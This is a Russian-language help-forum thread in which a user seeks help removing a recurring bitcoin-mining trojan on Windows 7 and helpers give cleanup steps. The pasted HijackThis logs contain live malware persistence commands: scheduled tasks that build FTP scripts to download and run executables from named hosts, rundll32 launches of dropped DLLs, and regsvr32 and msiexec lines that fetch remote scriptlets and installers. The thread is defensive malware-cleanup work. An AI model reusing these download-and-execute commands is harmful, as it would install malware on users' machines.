Троян майнер 0621.exe и lsmo.exe

[netmaster]

Сначала появился троян майнер 0621.ехе в папке debug в каталоге виндовс(ось 7х64). Успешно выпилил его без особых проблем.

Спустя пару дней появился новый троян lsmo.exe (уже в папке help), тоже майнит биткойны. Процесс хакер показывает, что запускается он процессом wininit. После удаления возвращается в рандомное время и снова начинает майнить. Последний месяц новых программ не устанавливалось. При этом левых процессов не запущено, компьютер не перезагружается, автозагрузка пустая, левых служб нет, в реестре тоже ничего нет в автозагрузке. В планировщике заданий нет ничего. Все темповые файлы почистил.

Не могу найти, что его скачивает по новой и запускает. Систему переставлять не очень хочется, слишком много нужного софта стоит.

[Mark D. Pearlstone]

Порядок оформления запроса о помощи

[netmaster]

Куреитом прогонял, ничего не находит.

Логи прикрепил

Думаю вот что вызывает проблемы

log:

 

O22 - Task (Ready): Mysa - C:\Windows\system32\cmd.exe /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe
O22 - Task (Ready): Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
O22 - Task (Ready): Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O22 - Task (Ready): ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa

 

 

 

Вот еще гадость в реестре нашел, выпилил.

reg':

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\start]
regsvr32 /u /s /i:http://js.mykings.top:280/v.sctscrobj.dll []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\start1]
msiexec.exe /i http://js.mykings.top:280/helloworld.msi/q []

 

В C:\Windows\System32\Tasks удалил файлы Mysa, Mysa1, ok

CollectionLog-2017.07.09-20.48.zip

Изменено 9 июля, 2017 пользователем netmaster

[regist]

1)

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lineage 2\ﾈ胙魵鐱 濵粽・url

заархивируйте и прикрепите к сообщению.

 

2)  - Проведите эту процедуру. Полученную ссылку после загрузки карантина virusinfo_auto_имя_вашего_ПК.zip через данную форму напишите в своём в сообщении здесь.
 

3) - Перетащите лог Check_Browsers_LNK.log на утилиту ClearLNK. Отчёт о работе прикрепите.
 

4) "Пофиксите" в HijackThis:

R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://do-search.com/web/?type=ds&ts=1426535510&from=cor&uid=ST250DM001XHD253GJ_S24JJ90D805913&q={searchTerms}
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://do-search.com/web/?type=ds&ts=1426535510&from=cor&uid=ST250DM001XHD253GJ_S24JJ90D805913&q={searchTerms}
R0-32 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://do-search.com/web/?type=ds&ts=1426535510&from=cor&uid=ST250DM001XHD253GJ_S24JJ90D805913&q={searchTerms}
R0-32 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://do-search.com/web/?type=ds&ts=1426535510&from=cor&uid=ST250DM001XHD253GJ_S24JJ90D805913&q={searchTerms}
R4 - HKCU\Software\Microsoft\Internet Explorer\SearchScopes: DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A} - Bing - http://do-search.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=ST250DM001XHD253GJ_S24JJ90D805913&ts=1426535590&type=default&q={searchTerms}
R4 - HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: URL = http://do-search.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=ST250DM001XHD253GJ_S24JJ90D805913&ts=1426535590&type=default&q={searchTerms}
R4 - HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0} - e - http://do-search.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=ST250DM001XHD253GJ_S24JJ90D805913&ts=1426535590&type=default&q={searchTerms}
R4 - HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C} - Google - http://do-search.com/web/?utm_source=b&utm_medium=cor&utm_campaign=install_ie&utm_content=ds&from=cor&uid=ST250DM001XHD253GJ_S24JJ90D805913&ts=1426535590&type=default&q={searchTerms}
O2-32 - BHO: IETabPage Class - {3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C} - C:\Program Files (x86)\XTab\SupTab.dll (file missing)
O2-32 - BHO: PROMT - {1F13CE11-4FAC-49A9-8155-D4F3F0F91A33} - N:\G\PRMT9\PRMTIE\prmtie.dll (file missing)
O3-32 - Toolbar: Переводчик PROMT - {C7DDDD27-F303-42A5-B979-51559F7DC0F0} - N:\G\PRMT9\PRMTIE\prmtie.dll (file missing)
O4 - MSConfig\startupreg: [GarenaPlus] C:\Garena Plus\GarenaMessenger.exe -autolaunch (file missing) (HKCU) (2014/05/01)
O4 - MSConfig\startupreg: [NeteaseGacc] N:\Netease\ty\game\uu\uu.exe  (file missing) (HKLM) (2016/12/04)
O4 - MSConfig\startupreg: [start1] C:\Windows\system32\msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q (HKLM) (2017/05/09)
O4 - MSConfig\startupreg: [start] C:\Windows\system32\regsvr32.exe /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll (HKLM) (2017/05/09)
O8 - Extra context menu item: Автоматически определить профиль перевода - N:\G\PRMT9\PRMTIE\aot.htm (file missing)
O8 - Extra context menu item: Настроить параметры перевода - N:\G\PRMT9\PRMTIE\options.htm (file missing)
O8 - Extra context menu item: Перевести всю страницу - N:\G\PRMT9\PRMTIE\page.htm (file missing)
O8 - Extra context menu item: Перевести выделенный текст - N:\G\PRMT9\PRMTIE\translat.htm (file missing)
O8 - Extra context menu item: Перевести поисковый запрос - N:\G\PRMT9\PRMTIE\search.htm (file missing)
O22 - Task (Ready): GameNet - C:/Program Files (x86)/QGNA/qGNA.exe /minimized (file missing)

 

5) Сделайте полный образ автозапуска uVS, только программу скачайте отсюда.
 

[Михаил Андропов]

Это что-то невероятное. Ничто не может справится с этим вирусом. Спустя 2-3 часа он снова вылезает и начинает майнить. Проблем он не доставляет, так как просто закрывается процесс, но всё же...Выход только переходить на 10-ку?

[Sandor]

@Михаил Андропов, здравствуйте! Не пишите в чужой теме. Создайте свою и выполните Порядок оформления запроса о помощи